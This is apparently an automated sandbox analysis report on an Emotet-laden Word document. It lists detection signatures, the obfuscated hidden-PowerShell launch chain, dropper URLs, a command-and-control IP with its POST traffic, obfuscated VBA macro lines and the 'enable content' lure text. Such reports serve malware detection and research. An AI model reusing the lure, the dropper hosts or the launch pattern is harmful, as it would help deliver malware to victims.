Analysis Report DATA-480841.doc

Overview

General Information

Sample Name: DATA-480841.doc
Analysis ID: 336494
MD5: 2ed8a95357ee4e2d433bcbeb2ef43fc9
SHA1: 06838eec498718aace03e6ef28d3f0292a631f8a
SHA256: 485c5e8d7bc0f0fc416a7d6cfa8780ebc42c03ff41568af70c358ee8b8afa02c

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1604 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [encoded command omitted] MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2524 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2544 cmdline: POwersheLL -w hidden -ENCOD [encoded command omitted] MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2808 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2724 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2916 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2276 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3020 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2248 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x890:$s1: POwersheLL

Unpacked PEs

Source | Rule | Description | Author | Strings
13.2.rundll32.exe.240000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
11.2.rundll32.exe.470000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.200000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.200000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
12.2.rundll32.exe.2b0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started, Author: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD [encoded command omitted]

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://veterinariadrpopui.com/content/5f18Q/, Avira URL Cloud: Label: malware
Source: http://khanhhoahomnay.net/wordpress/CGMC/, Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/, Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file
Source: DATA-480841.doc, Virustotal: Detection: 59%

Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 15_2_002175AE CryptDecodeObjectEx,15_2_002175AE
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 15_2_0021109C FindFirstFileW,15_2_0021109C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic, DNS query: name: wpsapk.com
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp, String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp, String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp, String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp, String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp, String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp, String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp, String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/

Source: global traffic, HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1 | Host: wpsapk.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1 | Host: sofsuite.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1 | Host: veterinariadrpopui.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1 | Host: khanhhoahomnay.net | Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 209.59.139.39
Source: Joe Sandbox View, IP Address: 5.2.136.90
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: LIQUIDWEBUS
Source: global traffic, HTTP traffic detected: POST /6tycsc/ HTTP/1.1 | DNT: 0 | Referer: 5.2.136.90/6tycsc/ | Content-Type: multipart/form-data; boundary=----------OGLPvif2cE | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 5.2.136.90 | Content-Length: 7412 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 15_2_0022023A InternetReadFile,15_2_0022023A
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B01F17D-537D-406E-B057-1B1541B1D39D}.tmp
Source: unknown, DNS traffic detected: queries for: wpsapk.com
Source: unknown, HTTP traffic detected: POST /6tycsc/ HTTP/1.1 | DNT: 0 | Referer: 5.2.136.90/6tycsc/ | Content-Type: multipart/form-data; boundary=----------OGLPvif2cE | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 5.2.136.90 | Content-Length: 7412 | Connection: Keep-Alive | Cache-Control: no-cache

E-Banking Fraud:

Yara detected Emotet

                    System Summary:

                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                    Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
                    Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                    Source: Screenshot number: 4, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
                    Source: Screenshot number: 8, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
                    Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Screenshot number: 8, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 8, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
                    Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Document contains an embedded VBA macro with suspicious strings
                    Source: DATA-480841.doc, OLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                    Source: DATA-480841.doc, OLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA"), Name: G8xesq0b8jlsfrsp
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB"), Name: Jlda77h_v8nx5
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR"), Name: Jlda77h_v8nx5
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD"), Name: Jlda77h_v8nx5
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC"), Name: Jlda77h_v8nx5
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs"), Name: Hrs2a1p95u19
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD"), Name: Hrs2a1p95u19
                    Document contains an embedded VBA with base64 encoded strings
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
                    Source: VBA code instrumentation, OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE
                    Very long command line found
                    Source: unknown, Process created: Commandline size = 5709
                    Source: unknown, Process created: Commandline size = 5613
                    Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 5613
                    Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Gpnlsmsow\
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C60B99_2_006C60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C80BA9_2_006C80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C12809_2_006C1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D889D9_2_006D889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CC7699_2_006CC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0B689_2_006D0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C8F789_2_006C8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C5B799_2_006C5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CE3779_2_006CE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D17739_2_006D1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D23499_2_006D2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D8F499_2_006D8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D9B459_2_006D9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CB75F9_2_006CB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C67549_2_006C6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C153C9_2_006C153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CBB3A9_2_006CBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CF5369_2_006CF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0D339_2_006D0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0F0C9_2_006D0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D7D039_2_006D7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D5D1D9_2_006D5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D8D1C9_2_006D8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D7F1F9_2_006D7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D511B9_2_006D511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D2B169_2_006D2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CB1129_2_006CB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D71EF9_2_006D71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D67E99_2_006D67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CD7EB9_2_006CD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D3FE79_2_006D3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D31E29_2_006D31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C9FDC9_2_006C9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D1BDF9_2_006D1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C17AC9_2_006C17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D73AC9_2_006D73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C69A09_2_006C69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D6DB99_2_006D6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D61B89_2_006D61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CF98C9_2_006CF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D878F9_2_006D878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D95869_2_006D9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C839D9_2_006C839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C6D9F9_2_006C6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C79989_2_006C7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB41F10_2_001DB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DEE7810_2_001DEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D2C6310_2_001D2C63
